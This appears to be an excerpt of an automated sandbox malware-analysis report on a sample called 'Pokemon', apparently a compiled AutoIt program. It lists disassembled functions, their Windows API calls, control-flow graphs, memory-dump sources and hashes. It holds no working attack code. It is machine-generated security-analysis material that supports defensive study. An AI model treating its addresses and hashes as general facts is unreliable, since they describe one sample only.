                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f1bb1b817511a756a6b3bc73cbe4a123ad58152a8adeaa39650dd8f1e053377a
                                                                                                                                                                                                                                                                                      • Instruction ID: fa54abf73b616b390cf833570759b1a12a963643321abd52905d78d42d47286e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1bb1b817511a756a6b3bc73cbe4a123ad58152a8adeaa39650dd8f1e053377a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A632DE30604382EFDB78CB25C885BBABBE4BF81304F14452DE565D72A2C775E994DB82
                                                                                                                                                                                                                                                                                      Function 00093624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00093657
                                                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 00093681
                                                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00093692
                                                                                                                                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000936AF
                                                                                                                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000936BF
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000936D5
                                                                                                                                                                                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000936E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                      • String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                      • API String ID: 2914291525-199739205
                                                                                                                                                                                                                                                                                      • Opcode ID: ca06fbc74ac4e4fda9aee952a88739032b9b8d01454b6a2fcaa4dc1ad320abe1
                                                                                                                                                                                                                                                                                      • Instruction ID: e201a5acaf56bd5b92f5a97f1ccef83ddd41c45200d1faf65fcaa2342430ea8b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca06fbc74ac4e4fda9aee952a88739032b9b8d01454b6a2fcaa4dc1ad320abe1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B421EEB1D01328AFDB10DFA4EC89A9DBBB4FB08718F10521AF611A66A0D7B945918F94
                                                                                                                                                                                                                                                                                      Function 000D09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 366 d09db-d0a0b call d07af 369 d0a0d-d0a18 call bf636 366->369 370 d0a26-d0a32 call c5594 366->370 377 d0a1a-d0a21 call bf649 369->377 375 d0a4b-d0a94 call d071a 370->375 376 d0a34-d0a49 call bf636 call bf649 370->376 385 d0a96-d0a9f 375->385 386 d0b01-d0b0a GetFileType 375->386 376->377 387 d0cfd-d0d03 377->387 391 d0ad6-d0afc GetLastError call bf613 385->391 392 d0aa1-d0aa5 385->392 388 d0b0c-d0b3d GetLastError call bf613 CloseHandle 386->388 389 d0b53-d0b56 386->389 388->377 403 d0b43-d0b4e call bf649 388->403 394 d0b5f-d0b65 389->394 395 d0b58-d0b5d 389->395 391->377 392->391 396 d0aa7-d0ad4 call d071a 392->396 400 d0b69-d0bb7 call c54dd 394->400 401 d0b67 394->401 395->400 396->386 396->391 409 d0bb9-d0bc5 call d092b 400->409 410 d0bc7-d0beb call d04cd 400->410 401->400 403->377 409->410 415 d0bef-d0bf9 call c8a2e 409->415 416 d0bed 410->416 417 d0bfe-d0c41 410->417 415->387 416->415 419 d0c43-d0c47 417->419 420 d0c62-d0c70 417->420 419->420 422 d0c49-d0c5d 419->422 423 d0cfb 420->423 424 d0c76-d0c7a 420->424 422->420 423->387 424->423 425 d0c7c-d0caf CloseHandle call d071a 424->425 428 d0cb1-d0cdd GetLastError call bf613 call c56a6 425->428 429 d0ce3-d0cf7 425->429 428->429 429->423
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000D071A: CreateFileW.KERNEL32(00000000,00000000,?,000D0A84,?,?,00000000,?,000D0A84,00000000,0000000C), ref: 000D0737
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0AEF
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0AF6
                                                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 000D0B02
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0B0C
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0B15
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 000D0B35
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000D0C7F
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000D0CB1
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000D0CB8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                      • String ID: H
                                                                                                                                                                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                      • Opcode ID: 3c16d9f71dc9b71302da4a5ed5d0b3ce67eb2589599432f35e803727701cb1df
                                                                                                                                                                                                                                                                                      • Instruction ID: c3454450a3f5c8ece8779f4c17c8b0bf31d5354291e9865ff1b8dff3e15d5677
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c16d9f71dc9b71302da4a5ed5d0b3ce67eb2589599432f35e803727701cb1df
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7A13632A142099FDF28EF68DC52BED3BE0AB06324F14015AF815DB392D7319D52CB62
                                                                                                                                                                                                                                                                                      Function 000952A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 000955B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0009525A
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000953C4
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000D4BFD
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000D4C3E
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000D4C80
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000D4CE7
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000D4CF6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                      • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                      • Opcode ID: 3ae69a2401054b827a13ca87a48e8ba5bea9060b315aff9e1b0a6ac869eba983
                                                                                                                                                                                                                                                                                      • Instruction ID: 973bf465e4b6c905ebb3215f7ea168e46464aab2f4ea6bfac7a2c40052f8abc1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3ae69a2401054b827a13ca87a48e8ba5bea9060b315aff9e1b0a6ac869eba983
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA719E71505301AFC714EF69EC819ABBBE8FF58750F80442EF451932A1EFB19A89CB61
                                                                                                                                                                                                                                                                                      Function 000934D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 000934DE
                                                                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 000934ED
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(00000063), ref: 00093503
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00093515
                                                                                                                                                                                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00093527
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0009353F
                                                                                                                                                                                                                                                                                      • RegisterClassExW.USER32(?), ref: 00093590
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: GetSysColorBrush.USER32(0000000F), ref: 00093657
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: RegisterClassExW.USER32(00000030), ref: 00093681
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00093692
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: InitCommonControlsEx.COMCTL32(?), ref: 000936AF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000936BF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: LoadIconW.USER32(000000A9), ref: 000936D5
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000936E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                      • Opcode ID: a92730d718b2e792ee6051b5b9255eee19ebabbc96c52991eebf8f6b54b76ad5
                                                                                                                                                                                                                                                                                      • Instruction ID: 6b600ac54ea2db410c3798997863ff742ec39b5ecd597e62714ab3564794b24d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a92730d718b2e792ee6051b5b9255eee19ebabbc96c52991eebf8f6b54b76ad5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E213870D10718ABDB109FA5EC49AAABFB4FB0CB54F00402BE604B67A0C7F909958F90
                                                                                                                                                                                                                                                                                      Function 00110FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 507 110fb8-110fef call 9e6a0 510 110ff1-110ffe call 9c98d 507->510 511 11100f-111021 WSAStartup 507->511 510->511 519 111000-11100b call 9c98d 510->519 513 111023-111031 511->513 514 111054-111091 call ac1f6 call 98ec0 call af9d4 inet_addr gethostbyname 511->514 516 111033 513->516 517 111036-111046 513->517 530 111093-1110a0 IcmpCreateFile 514->530 531 1110a2-1110b0 514->531 516->517 520 111048 517->520 521 11104b-11104f 517->521 519->511 520->521 525 111249-111251 521->525 530->531 532 1110d3-111100 call b017b call 9423c 530->532 533 1110b2 531->533 534 1110b5-1110c5 531->534 543 111102-111129 IcmpSendEcho 532->543 544 11112b-111148 IcmpSendEcho 532->544 533->534 535 1110c7 534->535 536 1110ca-1110ce 534->536 535->536 538 111240-111244 call 9bd98 536->538 538->525 545 11114c-11114e 543->545 544->545 546 111150-111155 545->546 547 1111ae-1111bc 545->547 548 1111f8-11120a call 9e6a0 546->548 549 11115b-111160 546->549 550 1111c1-1111c8 547->550 551 1111be 547->551 565 111210 548->565 566 11120c-11120e 548->566 553 111162-111167 549->553 554 1111ca-1111d8 549->554 552 1111e4-1111ed 550->552 551->550 558 1111f2-1111f6 552->558 559 1111ef 552->559 553->547 560 111169-11116e 553->560 556 1111da 554->556 557 1111dd 554->557 556->557 557->552 562 111212-111229 IcmpCloseHandle WSACleanup 558->562 559->558 563 111170-111175 560->563 564 111193-1111a1 560->564 562->538 570 11122b-11123d call b013d call b0184 562->570 563->554 567 111177-111185 563->567 568 1111a3 564->568 569 1111a6-1111ac 564->569 565->562 566->562 571 111187 567->571 572 11118a-111191 567->572 568->569 569->552 570->538 571->572 572->552
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000101,?), ref: 00111019
                                                                                                                                                                                                                                                                                      • inet_addr.WSOCK32(?), ref: 00111079
                                                                                                                                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 00111085
                                                                                                                                                                                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00111093
                                                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00111123
                                                                                                                                                                                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00111142
                                                                                                                                                                                                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00111216
                                                                                                                                                                                                                                                                                      • WSACleanup.WSOCK32 ref: 0011121C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                      • String ID: Ping
                                                                                                                                                                                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                      • Opcode ID: 6956f40e0bc84be4cacc882e236f541c3ee6b249cde53ee9f34ad2315cdc2c0e
                                                                                                                                                                                                                                                                                      • Instruction ID: 9f27399d40c4f4704b25540aa9d0280df3288beac05d76aa8c0a99595703f624
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6956f40e0bc84be4cacc882e236f541c3ee6b249cde53ee9f34ad2315cdc2c0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2191C131604241BFD724DF25D888F96FBE0BF48318F1585A9F6698B6A2C730ED85CB81
                                                                                                                                                                                                                                                                                      Function 0009370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 577 9370f-93724 578 93784-93786 577->578 579 93726-93729 577->579 578->579 582 93788 578->582 580 9372b-93732 579->580 581 9378a 579->581 583 93738-9373d 580->583 584 93804-9380c PostQuitMessage 580->584 586 d3df4-d3e1c call 92f92 call af23c 581->586 587 93790-93795 581->587 585 9376f-93777 DefWindowProcW 582->585 588 93743-93747 583->588 589 d3e61-d3e75 call fc8f7 583->589 592 937b8-937ba 584->592 591 9377d-93783 585->591 623 d3e21-d3e28 586->623 593 937bc-937e3 SetTimer RegisterWindowMessageW 587->593 594 93797-9379a 587->594 597 9374d-93752 588->597 598 9380e-93818 call afcad 588->598 589->592 616 d3e7b 589->616 592->591 593->592 599 937e5-937f0 CreatePopupMenu 593->599 595 d3d95-d3d98 594->595 596 937a0-937b3 KillTimer call 93907 call 959ff 594->596 608 d3d9a-d3d9e 595->608 609 d3dd0-d3def MoveWindow 595->609 596->592 603 93758-9375d 597->603 604 d3e46-d3e4d 597->604 618 9381d 598->618 599->592 614 93763-93769 603->614 615 937f2-93802 call 9381f 603->615 604->585 613 d3e53-d3e5c call f1423 604->613 610 d3dbf-d3dcb SetFocus 608->610 611 d3da0-d3da3 608->611 609->592 610->592 611->614 619 d3da9-d3dba call 92f92 611->619 613->585 614->585 614->623 615->592 616->585 618->592 619->592 623->585 627 d3e2e-d3e41 call 93907 call 9396b 623->627 627->585
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00093709,?,?), ref: 00093777
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00093709,?,?), ref: 000937A3
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000937C6
                                                                                                                                                                                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00093709,?,?), ref: 000937D1
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 000937E5
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00093806
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                      • String ID: TaskbarCreated
                                                                                                                                                                                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                                                                                                                                                                                      • Opcode ID: 8f19b994a1a48d2db5f029536e02e098b17ed935bd17b80d0bbef1950ace576d
                                                                                                                                                                                                                                                                                      • Instruction ID: 561258148accc56b6d53fd785d31673c3050f22d23b337c4d52e160b2d8c6ad7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f19b994a1a48d2db5f029536e02e098b17ed935bd17b80d0bbef1950ace576d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5841E6F5208644BBDF342BB8DD4ABBDBAA5E744304F000125F502966D1CBB89F95BF62
                                                                                                                                                                                                                                                                                      Function 000C90C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 633 c90c5-c90d5 634 c90ef-c90f1 633->634 635 c90d7-c90ea call bf636 call bf649 633->635 637 c9459-c9466 call bf636 call bf649 634->637 638 c90f7-c90fd 634->638 651 c9471 635->651 656 c946c call c2b5c 637->656 638->637 641 c9103-c912e 638->641 641->637 644 c9134-c913d 641->644 647 c913f-c9152 call bf636 call bf649 644->647 648 c9157-c9159 644->648 647->656 649 c915f-c9163 648->649 650 c9455-c9457 648->650 649->650 654 c9169-c916d 649->654 655 c9474-c9479 650->655 651->655 654->647 659 c916f-c9186 654->659 656->651 662 c9188-c918b 659->662 663 c91a3-c91ac 659->663 664 c918d-c9193 662->664 665 c9195-c919e 662->665 666 c91ae-c91c5 call bf636 call bf649 call c2b5c 663->666 667 c91ca-c91d4 663->667 664->665 664->666 670 c923f-c9259 665->670 695 c938c 666->695 668 c91db-c91dc call c3b93 667->668 669 c91d6-c91d8 667->669 677 c91e1-c91f9 call c2d38 * 2 668->677 669->668 672 c932d-c9336 call cfc1b 670->672 673 c925f-c926f 670->673 686 c9338-c934a 672->686 687 c93a9 672->687 673->672 676 c9275-c9277 673->676 676->672 680 c927d-c92a3 676->680 703 c91fb-c9211 call bf649 call bf636 677->703 704 c9216-c923c call c97a4 677->704 680->672 684 c92a9-c92bc 680->684 684->672 691 c92be-c92c0 684->691 686->687 689 c934c-c935b GetConsoleMode 686->689 693 c93ad-c93c5 ReadFile 687->693 689->687 694 c935d-c9361 689->694 691->672 696 c92c2-c92ed 691->696 698 c93c7-c93cd 693->698 699 c9421-c942c GetLastError 693->699 694->693 700 c9363-c937d ReadConsoleW 694->700 701 c938f-c9399 call c2d38 695->701 696->672 702 c92ef-c9302 696->702 698->699 707 c93cf 698->707 705 c942e-c9440 call bf649 call bf636 699->705 706 c9445-c9448 699->706 710 c939e-c93a7 700->710 711 c937f GetLastError 700->711 701->655 702->672 715 c9304-c9306 702->715 703->695 704->670 705->695 712 c944e-c9450 706->712 713 c9385-c938b call bf613 706->713 709 c93d2-c93e4 707->709 709->701 720 c93e6-c93ea 709->720 710->709 711->713 712->701 713->695 715->672 723 c9308-c9328 715->723 726 c93ec-c93fc call c8de1 720->726 727 c9403-c940e 720->727 723->672 738 c93ff-c9401 726->738 732 c941a-c941f call c8c21 727->732 733 c9410 call c8f31 727->733 739 c9415-c9418 732->739 733->739 738->701 739->738
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 49c1fdecb9ed0b7089df95d88541f11cfc7055df3dcac4c33ea69317771cdbb5
                                                                                                                                                                                                                                                                                      • Instruction ID: bfa0d457972591344f291b5df636e800030fb6ebe9326ae6f90dfa046b5ae347
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49c1fdecb9ed0b7089df95d88541f11cfc7055df3dcac4c33ea69317771cdbb5
